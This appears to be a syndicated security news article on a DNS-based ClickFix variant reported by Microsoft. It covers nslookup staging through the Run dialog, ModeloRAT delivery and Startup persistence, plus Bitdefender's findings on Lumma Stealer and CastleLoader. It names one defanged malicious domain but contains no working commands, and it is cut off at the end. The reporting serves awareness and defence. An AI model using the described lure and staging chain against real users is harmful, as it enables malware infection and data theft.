Microsoft has revealed a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing commands that initiate a Domain Name System (DNS) lookup to fetch a secondary malicious payload.
In this updated approach, threat actors use the “nslookup” command—short for nameserver lookup—triggered through the Windows Run dialog. The command performs a custom DNS query that retrieves instructions for the next stage of the attack.
ClickFix has gained traction in recent years and is commonly distributed through phishing emails, malvertising campaigns, and drive-by download schemes. Victims are typically redirected to fraudulent landing pages featuring fake CAPTCHA checks or fabricated system alerts, urging them to run commands in the Windows Run dialog or the macOS Terminal app to “resolve” non-existent issues.
The technique has spread rapidly over the past two years because it relies on users unknowingly infecting their own systems, effectively bypassing traditional security safeguards. Its success has led to multiple offshoots, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
“In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system’s default resolver,” the Microsoft Threat Intelligence team said in a series of posts on X. “The output is filtered to extract the Name: DNS response, which is executed as the second-stage payload.”
Microsoft explained that this variation uses DNS as a “lightweight staging or signaling channel,” allowing attackers to communicate with their infrastructure while introducing an additional validation layer before delivering the next payload.
“Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic,” the Windows maker added.
Following the DNS lookup, the attack chain downloads a ZIP archive from an external server (“azwsappdev[.]com”). Inside is a malicious Python script that conducts system reconnaissance, executes discovery commands, and drops a Visual Basic Script (VBScript). That VBScript launches ModeloRAT—a Python-based remote access trojan previously linked to CrashFix campaigns.
To maintain persistence, the malware creates a Windows shortcut (LNK) file in the Startup folder, ensuring automatic execution whenever the system reboots.
Lumma Stealer and CastleLoader Activity Intensifies
Separately, Bitdefender has reported a spike in Lumma Stealer operations, fueled by ClickFix-style fake CAPTCHA campaigns. These attacks deploy an AutoIt-based version of CastleLoader, a loader attributed to a threat actor known as GrayBravo (formerly TAG-150).
CastleLoader checks for virtualization environments and certain security software before decrypting and executing the stealer in memory. Beyond ClickFix tactics, attackers are also using websites offering cracked software and pirated movies to lure victims into downloading malicious installers disguised as MP4 files.
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
Read the original article: